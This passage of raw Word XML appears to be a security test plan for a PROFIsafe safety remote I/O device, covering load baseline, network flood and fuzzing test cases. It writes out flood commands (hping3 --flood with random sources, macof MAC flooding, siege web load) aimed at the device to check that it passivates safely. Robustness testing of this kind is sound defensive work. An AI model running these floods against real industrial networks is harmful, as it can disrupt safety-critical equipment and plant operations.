        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C59F7B" w14:textId="0F67C1FC" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="00DA6C1D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ010-01 - </w:t>
      </w:r>
      <w:r w:rsidR="00FE3CA3" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Baseline Resilience under Rated Conformant Load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4383EC21" w14:textId="77777777" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="00DA6C1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0EBE36E6"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32C58643" w14:textId="33323F72" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99"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 CR 7.2 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset A, Asset H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA6C1D" w:rsidRPr="006D5B99"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2958F669" w14:textId="745702F2" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99"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functional baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA6C1D" w:rsidRPr="006D5B99"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39ACB015" w14:textId="30CF3FBE" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99"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DA6C1D" w:rsidRPr="006D5B99"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09AF3825" w14:textId="04B2E709" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99"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stable operation and safe communication under the device's rated conformant network-load conditions, establishing the resilience baseline.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA6C1D" w:rsidRPr="006D5B99"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5FAF4443"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61DAA85D" w14:textId="77777777" w:rsidR="00684FEC"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network load up to the rated conformant-load class.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04DF8CD5" w14:textId="1C79D273" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99"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safe communication, qualifier, and output state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA6C1D" w:rsidRPr="006D5B99"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72E82275" w14:textId="77777777" w:rsidR="00684FEC"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safe communication and stable operation are maintained under </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">rated conformant load. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48AB95F1" w14:textId="70961BEC" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99"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device loses safe communication or destabilizes within rated load.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26B5EC99" w14:textId="77777777" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="00DA6C1D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C426F0B"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2FD7F669"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0233D971" w14:textId="37D0749F"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w:t>
            </w:r>
            <w:r w:rsidR="00A53D6E" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B2442" w:rsidRPr="006D5B99"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0B2442" w:rsidRPr="006D5B99" w:rsidRDefault="000B2442" w:rsidP="000B2442">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="449A7957" w14:textId="6F133984"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PROFINET conformance-test tool</w:t>
            </w:r>
            <w:r w:rsidR="00D50C24" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Kali, TIA laptop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B2442" w:rsidRPr="006D5B99"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0B2442" w:rsidRPr="006D5B99" w:rsidRDefault="000B2442" w:rsidP="000B2442">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ED3DDE9" w14:textId="01B2E8B7" w:rsidR="000B2442" w:rsidRPr="006D5B99" w:rsidRDefault="000B2442" w:rsidP="000B244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hping3, nmap --min-rate, Siege (CM-009, HTTP path), TIA Online &amp; Diagnostics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B2442" w:rsidRPr="006D5B99"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0B2442" w:rsidRPr="006D5B99" w:rsidRDefault="000B2442" w:rsidP="000B2442">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="479678D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2A5B694"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the baseline PROFIsafe connection as in TC-RQ001-01.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A5A35A3"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Generate approximated load (run in parallel):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51C8A161"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hping3 --flood --rand-source -2 -p 34964 $SRIO &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18E3E70C"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pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
              </w:rPr>
              <w:t>siege -c 50 -t 5M -v http://$SRIO/deviceinfo/getdata -l cm_rq010-01_siege.log</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A2384E8" w14:textId="77777777" w:rsidR="000B2442" w:rsidRPr="006D5B99" w:rsidRDefault="000B2442" w:rsidP="000B244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While the load runs, observe the TIA watch table for connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3804C9E5" w14:textId="3FAEB869" w:rsidR="000B2442" w:rsidRPr="006D5B99" w:rsidRDefault="000B2442" w:rsidP="000B244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stability / qualifier.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B2442" w:rsidRPr="006D5B99"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0B2442" w:rsidRPr="006D5B99" w:rsidRDefault="000B2442" w:rsidP="000B2442">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2639E558" w14:textId="281EBAE8" w:rsidR="000B2442" w:rsidRPr="006D5B99" w:rsidRDefault="000B2442" w:rsidP="000B2442">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PASS </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> safety communication remains stable within the Kali-generated load limits (qualifier stays good, no passivation).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="615E056C" w14:textId="77777777" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BCDF890" w14:textId="77777777" w:rsidR="00DA6C1D" w:rsidRPr="006D5B99" w:rsidRDefault="00DA6C1D" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B3FBC20" w14:textId="40C40454" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="00092A2E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C929D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ010-02 - </w:t>
      </w:r>
      <w:r w:rsidR="000F1B5F" w:rsidRPr="00C929D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network/Layer-2 Flood Resilience</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D539E2"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CCFA25E"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648541AD" w14:textId="5D1731E7" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 7.1 (RE1) / CR 7.2 / CR 3.6 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset H, Asset A, Asset E, Asset F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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5632DA6E" w14:textId="2B51575D" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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B73A1A" w:rsidRPr="006D5B99"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34DF52BD" w14:textId="7AEA2B29" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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B73A1A" w:rsidRPr="006D5B99"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755B92A4" w14:textId="3520A823"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Determine </w:t>
            </w:r>
            <w:r w:rsidR="00073D05" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>behavior</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> under a high-rate network flood: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="387E1CF9" w14:textId="77777777" w:rsidR="000F1B5F"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(a) maintain safe communication (conformant-load robustness), </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23A2C461" w14:textId="77777777" w:rsidR="006775CB"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(b) passivate to the defined safe state, or </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BDAD9CE" w14:textId="4F164004" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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 enter an undefined/hazardous state; and whether sustained flooding causes continuous forced passivation (availability impact).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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539C923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8A16873"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escalating frame flood (unicast + broadcast).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2330C6EA"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Continuously monitor qualifier, output state, and device state.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="214BCF42" w14:textId="77777777" w:rsidR="006775CB"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Sustain the flood; measure recovery vs. continuous passivation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42BFF148" w14:textId="745ADF0E" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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Stop; confirm acknowledged re-integration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10935BD7" w14:textId="56D0A7F7" w:rsidR="006775CB"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D5B99"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flood level produces an undefined or hazardous output state. Continuous forced passivation under sustained flood is recorded as an availability finding.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12B38172" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="006D5B99" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B799B8E"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6EF80BFA"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70ABA7BC" w14:textId="7FC5A5DB" w:rsidR="00B73A1A" w:rsidRPr="006D5B99"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TC-RQ010-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000557ED" w:rsidRPr="006D5B99"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0557ED" w:rsidRPr="006D5B99" w:rsidRDefault="000557ED" w:rsidP="000557ED">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5985FB1A" w14:textId="3F9483B2" w:rsidR="000557ED" w:rsidRPr="006D5B99" w:rsidRDefault="000557ED" w:rsidP="000557E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0557ED" w:rsidRPr="006D5B99"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0557ED" w:rsidRPr="006D5B99" w:rsidRDefault="000557ED" w:rsidP="000557ED">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63A5DA8C" w14:textId="1FA7EC82" w:rsidR="000557ED" w:rsidRPr="006D5B99" w:rsidRDefault="000557ED" w:rsidP="000557ED">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hping3, macof (dsniff package), Wireshark, TIA Online &amp; Diagnostics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000557ED" w:rsidRPr="006D5B99"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0557ED" w:rsidRPr="006D5B99" w:rsidRDefault="000557ED" w:rsidP="000557ED">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0828F2CC"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5F73F19"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Establish baseline.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="193C6465"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Escalating flood:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CE44704"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hping3 --flood --rand-source $SRIO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C853381"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then, in a separate run:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D15A78B"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macof -i eth1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02C94482"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Continuously observe the TIA watch table + diagnostics buffer; measure</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E55EDDD" w14:textId="77777777" w:rsidR="000557ED" w:rsidRPr="006D5B99" w:rsidRDefault="000557ED" w:rsidP="000557ED">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 time until passivation / restart.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11C4182D" w14:textId="30ABB103" w:rsidR="000557ED" w:rsidRPr="006D5B99" w:rsidRDefault="000557ED" w:rsidP="000557ED">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Stop the load</w:t>
            </w:r>
            <w:r w:rsidR="00462990">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>confirm restart requires acknowledgement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000557ED" w:rsidRPr="006D5B99"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47D4BD62" w:rsidR="000557ED" w:rsidRPr="006D5B99" w:rsidRDefault="000557ED" w:rsidP="000557ED">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="599F9DB0" w14:textId="0077FBA1" w:rsidR="000557ED" w:rsidRPr="006D5B99" w:rsidRDefault="000557ED" w:rsidP="000557ED">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PASS </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the SRIO passivates in a controlled manner (safe state) instead of entering an undefined state; after the load ends, restart occurs after acknowledgement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="227A9A3A" w14:textId="77777777" w:rsidR="006761B9" w:rsidRPr="006D5B99" w:rsidRDefault="006761B9" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF57985" w14:textId="77777777" w:rsidR="006761B9" w:rsidRPr="006D5B99" w:rsidRDefault="006761B9" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F92092F" w14:textId="0617E0FF" w:rsidR="006761B9" w:rsidRPr="006D5B99" w:rsidRDefault="00BA65DE" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ010-03 -  Protocol Fuzzing Robustness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDF294E" w14:textId="77777777" w:rsidR="00E60591" w:rsidRPr="006D5B99" w:rsidRDefault="00E60591" w:rsidP="00E6059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6D5B99"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6D5B99" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7371FFFC"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6D5B99"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6D5B99" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="643E07E4" w14:textId="78CD002C"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073D05" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 3.5 / CR 3.7 / CR 3.6 </w:t>
            </w:r>
            <w:r w:rsidR="00073D05" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset H, Asset A, Asset E</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E60591" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E8726FF" w14:textId="0EA53EDC" w:rsidR="00E60591" w:rsidRPr="006D5B99"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E60591" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51DBD4D5" w14:textId="0D662CB1" w:rsidR="00E60591" w:rsidRPr="006D5B99"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E60591" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="039435CE" w14:textId="732FA8BC" w:rsidR="00E60591" w:rsidRPr="006D5B99"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malformed fieldbus-discovery, safety-protocol, and web-interface inputs are safely rejected (input validation, error handling) or cause a crash/hang/undefined state</w:t>
            </w:r>
            <w:r w:rsidR="009652A7" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> verifying the device "withstands" unexpected input without a hazardous condition.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E60591" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0050A5FA"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30FC05F1"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Fuzz each interface with malformed inputs (discovery messages, safety-frame fields, web requests).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F7CC924" w14:textId="77777777" w:rsidR="00FB3AFF"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for crash/hang/watchdog reset vs. safe rejection/passivation.</w:t>
            </w:r>
          </w:p>
